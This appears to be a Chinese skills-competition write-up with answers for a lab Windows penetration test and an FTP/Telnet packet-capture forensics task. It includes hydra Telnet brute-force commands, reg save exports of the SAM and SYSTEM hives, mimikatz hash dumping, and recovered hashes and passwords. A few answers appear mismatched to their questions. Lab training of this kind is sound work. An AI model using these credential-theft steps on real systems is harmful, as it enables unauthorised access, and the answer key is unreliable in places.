B 模块安全事件响应/网络安全数据取证/应用安全(350 分)
B-1任务模块:Windows 操作系统渗透测试
1.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Windows 进行系统服务及版 本扫描渗透测试,并将该操作显示结果中 Telnet 服务对应的端口号作为 FLAG 提交;
nmap -sV 192.168.5.56
Telnet 服务对应的端口号作为 FLAG 提交
FLAG{23}
2.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Windows 进行渗透测试,使 用 kali 中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为 teltest), 将 hydra 使用的必要参数当做 FLAG 进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)
首先开启Telnet服务,创建teltest账户否则无法成功破解密码!!!!!
windows7 telnet服务开启和登录授权__荣耀之路_的博客-CSDN博客
创建密码字典,比赛的时候会自带
hydra -l teltest -P pass.txt 192.168.5.56 telnet -vV
flag值:{hydra -l teltest -P pass.txt 192.168.5.56 telnet -vV}
具体命令可以看笔记上的hydar工具使用
以上环境全部配置好后,密码破解就成功了
3.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Windows 进行渗透测试,使 用 kali 中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为 teltest), 将破解成功的密码当做 FLAG 进行提交;(字典路径 /usr/share/wordlists/dirb/small.txt)
根据上提得知密码
flag值:{123456}
首先通过kali渗透系统远程控制靶机桌面
安装rdesktop: apt-get install rdesktop
安装tsclient: apt-get install tsclient
rdesktop 192.168.5.56 // 靶机地址
4.通过本地 PC 中渗透测试平台 win7 对服务器场景 Windows 进行渗透测试,取 得的账户密码有远程桌面权限,将该场景系统中 sam 文件使用 reg 相关命令 提取,将完整命令作为 FLAG 提交;
提取文件前用管理员模式打开cmd,在进入c盘下就可以直接把文件保存在c盘下。如下操作:
Flag:reg save HKLM\SAM sam.hive
5.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;
Flag:reg save HKLM\SYSTEM system.hive
6.提取teltest密码信息
通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;
执行完上面的题可以发现生成了两个文件
把文件下载到本地
或者不下载到本地,通过远程控制win7找到sam.hive 与system.hive文件的位置放到c盘
用mimikatz工具解密
lsadump::sam /sam:C:\sam.hive /system:C:\system.hive
如提取的sam.hive 与system.hive文件没有放到c盘则找到文件所在的位置。
lsadump::sam /sam:C:\Windows\System32\sam.hive /system:C:\Windows\System32\system.hiv
PS:一般来说提取出来的文件默认在C:\Windows\System32位置下
放到windows7桌面mimimkatz软件进行解密
Flag:e452b0dfd950fabe692f48c63061641d
7.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交;
Flag: 6cfa9ce05f0afaa483beaea6567ea26e
根据上一题可以解出
B-3任务模块:信息取证分析
题目一样数据包不一样
1.从靶机服务器的 FTP 上下载 wireshark0817.pcap 数据包文件,找出黑客获取 到的可成功登录目标服务器 FTP 的账号密码,并将黑客获取到的账号密码作 为 Flag 值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;
筛选命令:ftp and tcp contains "Login"或者ftp and tcp contains "230"
找到两个相关的包
查看tpc跟踪流,得到黑客成功登录的账号密码
flag:{admin,admin654321}
2.继续分析数据包 wireshark0817.pcap,找出黑客使用获取到的账号密码登录 广西壮族自治区第二届职业技能大赛 7 / 10 FTP 的时间,并将黑客登录 FTP 的时间作为 Flag 值(例如:14:22:08)提交;
flag:{01:32:44}
3.继续分析数据包 wireshark0817.pcap,找出黑客连接 FTP 服务器时获取到的 FTP 服务版本号,并将获取到的 FTP 服务版本号作为 Flag 值提交;
flag:{vsFTPd 3.0.2}
4.继续分析数据包 wireshark0817.pcap,找出黑客成功登录 FTP 服务器后执行 的第一条命令,并将执行的命令作为 Flag 值提交;
继续根据第一题查看tcp流发现ftp的版本
flag:{ls}
5.继续分析数据包 wireshark0817.pcap,找出黑客成功登录 FTP 服务器后下载 的关键文件,并将下载的文件名称作为 Flag 值提交;
flag:{flag123.txt}
6.继续分析数据包 wireshark0817.pcap,找出黑客暴力破解目标服务器 Telnet 服务并成功获取到的用户名与密码,并将获取到的用户名与密码作为 Flag 值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;
筛选规则
telnet and tcp contains “pass”
flag:{root,toor654321}
7.继续分析数据包 wireshark0817.pcap,找出黑客在服务器网站根目录下添加 的文件,并将该文件的文件名称作为 Flag 值提交;
flag:{admin654321}
8.继续分析数据包 wireshark0817.pcap,找出黑客在服务器系统中添加的用户, 并将添加的用户名与密码作为 Flag 值(用户名与密码之间以英文逗号分隔, 例如:root,toor)提交。
flag:{user123,123456}